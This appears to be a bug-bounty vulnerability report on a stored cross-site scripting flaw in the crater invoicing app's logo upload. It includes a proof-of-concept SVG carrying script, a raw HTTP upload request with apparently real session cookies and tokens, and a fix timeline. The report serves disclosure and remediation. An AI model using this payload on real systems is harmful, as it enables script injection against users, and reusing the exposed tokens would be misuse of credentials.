Cross-site Scripting (XSS) - Stored in crater-invoice/crater

Valid

Reported on

Jan 16th 2022

Description

There is a vulnerability in the upload avatar functionality of crater invoice which would allow an attacker to upload malicious .SVG files in order to execute Javascript. All that is required is that the victim browse to the link location of the .SVG file

Proof of Concept

xss.svg:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert("svg xss");
   </script>
</svg>

Request:

POST /api/v1/company/upload-logo HTTP/1.1
Host: demo.craterapp.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
company: 2
X-XSRF-TOKEN: eyJpdiI6IldPbm1zN2h1QXM5MStpL3ZlNms5N0E9PSIsInZhbHVlIjoiSFk2RGMweXA4VSs3bFFocmFXN3ByTFB0a0lpb1ZTWWZ6dEdQUEVYdXpBTXlhV29CRy9FTlZoOUJ6WmFXZkt0eDh4OXdmTVB0eGV0Y0lNTTlSM2FmU1crMFVqUjFNL3FGQS8rbWsrUEtDcHhyTG8wVEw0V2pKSnVYamYxUmRycjEiLCJtYWMiOiJjYTM0NTEzYTQ4ZjNmNGVhNTZmYjg2ZmE4OGQ1NDMwNzFmZDQxMDA1Y2Y1ZGQxYzQ3MGQ0MzE0ODE3M2FmOTQyIiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------202251926415456929271193356967
Content-Length: 735
Origin: https://demo.craterapp.com
DNT: 1
Connection: keep-alive
Referer: https://demo.craterapp.com/admin/settings/company-info
Cookie: __stripe_mid=7d4c8a79-b568-4a3b-a898-67c90bb47968edd571; __stripe_sid=1cf6fd84-0a75-41ee-af21-ad527c27e72ce39a5c; XSRF-TOKEN=eyJpdiI6IldPbm1zN2h1QXM5MStpL3ZlNms5N0E9PSIsInZhbHVlIjoiSFk2RGMweXA4VSs3bFFocmFXN3ByTFB0a0lpb1ZTWWZ6dEdQUEVYdXpBTXlhV29CRy9FTlZoOUJ6WmFXZkt0eDh4OXdmTVB0eGV0Y0lNTTlSM2FmU1crMFVqUjFNL3FGQS8rbWsrUEtDcHhyTG8wVEw0V2pKSnVYamYxUmRycjEiLCJtYWMiOiJjYTM0NTEzYTQ4ZjNmNGVhNTZmYjg2ZmE4OGQ1NDMwNzFmZDQxMDA1Y2Y1ZGQxYzQ3MGQ0MzE0ODE3M2FmOTQyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlJaTTJTc0E3eVZWWXhjT3BZYnJlSnc9PSIsInZhbHVlIjoiTU5jaFY5MTk4SWRRZEZYMC8zSDkxZDhLMHp0NklPU1RtQUE3dEkwRzByMGVVY3BBSG1TeUI5ZkhKRGJsWHhybThEeFNjREdyd295UmVBV0h1dVAzb3Z6U3JiZ0ErNUtPTnRYMlpBNnJXR0lWN2JObGtDKzJ0MVRMaDVpSzlKOFQiLCJtYWMiOiIxYTc1YmM3OWZiYTM4OTA3ZWIwZWU5NzA5NGIxYzRkMGM2MGJlNTI0NjcyZGQ3ZWVjNWIyMTQzMTFhOGY5NjY4IiwidGFnIjoiIn0%3D; kQ8ZSOBtOqtWUFzuaiCYX7I5LKHRDCE3lwldiGew=eyJpdiI6IkQ3VE5lWjlINkU3Y1ZvUktSdkhSS1E9PSIsInZhbHVlIjoiSFBCcDNsYVd3K3JIL3BhVWRHUWs3THBmVEl1MWtOYmo4VzUrT2p2azhzV3ZoY2lWcUk0KzlXZWJOK3ZLbUtML3N6SGxXV3FjeGU1c0lvcGwrYnlMWTByNk9mbWcrcjlSd2VtNTVZcUtiTDJvb0pyUDhmdlJZUXc3cjlJOHMzZEJscXVWZGJzRmJyRzhNcEpENnNGOWxEK3d3S200OG5hd3duZ2tCazRZaDBVUWkvZlgxaWtoNC9HenlTb2QyVmlnY2pIUSt4bmw0YnkzWGNibjNKcWxkY1B3RzV3c0pHYURnNDJMRXBkUHFrWDEvQkdORkYzK0xXTVVoSEx3YldWN0J2ZEJkTytSWU1tR0VVUFhheTVMek1XWStiZnFrZTArU0pMUFhEWE8yZStkRkpzWS9oM1hsTk00L01mY2tWSko4NFdZcUtBRlo0N0QvMWZBZmR3bVRRU29zRXJyM3RZdmpDRGE4MG9EelR2eUQzZThQK1R2dDc0dEJoMmE2OTZMT3h1eWhZdXN3bkhjVTFrTThXTStPdzhtemkzMEdKdXRoTC96RXFtSzh3MEZJanFGRjI3bGpMN3hyTllrQjk5UFdpdUNiY3ZzQThyUjF3enVvZHpkc3p3TCt3eDJnQmxvUjZQWXNmRC9aWGdQMk0rcENPNmNaaTVEbk9QWit4bitGOENKRWpSSTR2UllXZFpuYUhEQmpidE40ZXFwZHVsYkMwbk84eDBGVzVSR2w4S0pXNDgwZUU2UjJpL0tIb2ZnIiwibWFjIjoiNDRmMDY0MjE5ZTNmNmE3ZGQ5Yzg2N2U1ZTYyZDk2MzU2YWQ3YTg1MDE2Y2FlYzcyN2MyNGZlODdjYmY4ZjFiMSIsInRhZyI6IiJ9
Sec-GPC: 1

-----------------------------202251926415456929271193356967
Content-Disposition: form-data; name="company_logo"

{"name":"xss.svg","data":"data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgo8c3ZnIHZlcnNpb249IjEuMSIgYmFzZVByb2ZpbGU9ImZ1bGwiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+CiAgIDxwb2x5Z29uIGlkPSJ0cmlhbmdsZSIgcG9pbnRzPSIwLDAgMCw1MCA1MCwwIiBmaWxsPSIjMDA5OTAwIiBzdHJva2U9IiMwMDQ0MDAiLz4KICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgogICAgICBhbGVydCgic3ZnIHhzcyIpOwogICA8L3NjcmlwdD4KPC9zdmc+Cg=="}
-----------------------------202251926415456929271193356967--

Response:

{"success":true}

Impact

This vulnerability is capable of Javascript code execution. An attacker can use this to upload a malicious .SVG file with Javascript embedded into it, then whenever a user visits the link to the .SVG file, the malicious Javascript would execute.

We are processing your report and will contact the crater-invoice/crater team within 24 hours. a year ago

We have contacted a member of the crater-invoice/crater team and are waiting to hear back a year ago

We have sent a follow up to the crater-invoice/crater team. We will try again in 7 days. a year ago

Mohit Panjwani validated this vulnerability a year ago

1d8 has been awarded the disclosure bounty

The fix bounty is now up for grabs

Mohit Panjwani marked this as fixed in 6.0.2 with commit cdc913 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation